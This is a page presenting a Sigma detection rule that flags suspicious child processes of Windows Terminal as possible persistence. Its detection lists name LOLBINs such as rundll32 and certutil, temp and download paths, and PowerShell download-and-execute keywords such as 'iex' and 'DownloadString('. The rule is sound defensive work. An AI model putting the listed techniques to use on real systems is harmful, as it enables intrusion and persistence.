Suspicious WindowsTerminal Child Processes

calendar Aug 12, 2024 · attack.execution attack.persistence  ·
Share on: linkedin copy

Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)

Sigma rule (View on GitHub)

 1title: Suspicious WindowsTerminal Child Processes
 2id: 8de89e52-f6e1-4b5b-afd1-41ecfa300d48
 3status: test
 4description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)
 5references:
 6    - https://persistence-info.github.io/Data/windowsterminalprofile.html
 7    - https://twitter.com/nas_bench/status/1550836225652686848
 8author: Nasreddine Bencherchali (Nextron Systems)
 9date: 2022-07-25
10modified: 2023-02-14
11tags:
12    - attack.execution
13    - attack.persistence
14logsource:
15    category: process_creation
16    product: windows
17detection:
18    selection_parent:
19        ParentImage|endswith:
20            - '\WindowsTerminal.exe'
21            - '\wt.exe'
22    selection_susp:
23        - Image|endswith:
24              # Add more LOLBINS
25              - '\rundll32.exe'
26              - '\regsvr32.exe'
27              - '\certutil.exe'
28              - '\cscript.exe'
29              - '\wscript.exe'
30              - '\csc.exe'
31        - Image|contains:
32              # Add more suspicious paths
33              - 'C:\Users\Public\'
34              - '\Downloads\'
35              - '\Desktop\'
36              - '\AppData\Local\Temp\'
37              - '\Windows\TEMP\'
38        - CommandLine|contains:
39              # Add more suspicious commandline
40              - ' iex '
41              - ' icm'
42              - 'Invoke-'
43              - 'Import-Module '
44              - 'ipmo '
45              - 'DownloadString('
46              - ' /c '
47              - ' /k '
48              - ' /r '
49    filter_builtin_visual_studio_shell:
50        CommandLine|contains|all:
51            - 'Import-Module'
52            - 'Microsoft.VisualStudio.DevShell.dll'
53            - 'Enter-VsDevShell'
54    filter_open_settings:
55        CommandLine|contains|all:
56            - '\AppData\Local\Packages\Microsoft.WindowsTerminal_'
57            - '\LocalState\settings.json'
58    filter_vsdevcmd:
59        CommandLine|contains|all:
60            - 'C:\Program Files\Microsoft Visual Studio\'
61            - '\Common7\Tools\VsDevCmd.bat'
62    condition: all of selection_* and not 1 of filter_*
63falsepositives:
64    - Other legitimate "Windows Terminal" profiles
65level: medium

References

  • Windows Terminal Profile

    Windows Terminal Profile Location: %LOCALAPPDATA%\Packages\Microsoft.WindowsTerminal_8wekyb3d8bbwe\LocalState\settings.json Classification: Criteria Value Permissions User Security context User Per...


    Read More

  • x.com


    Read More

Related rules

to-top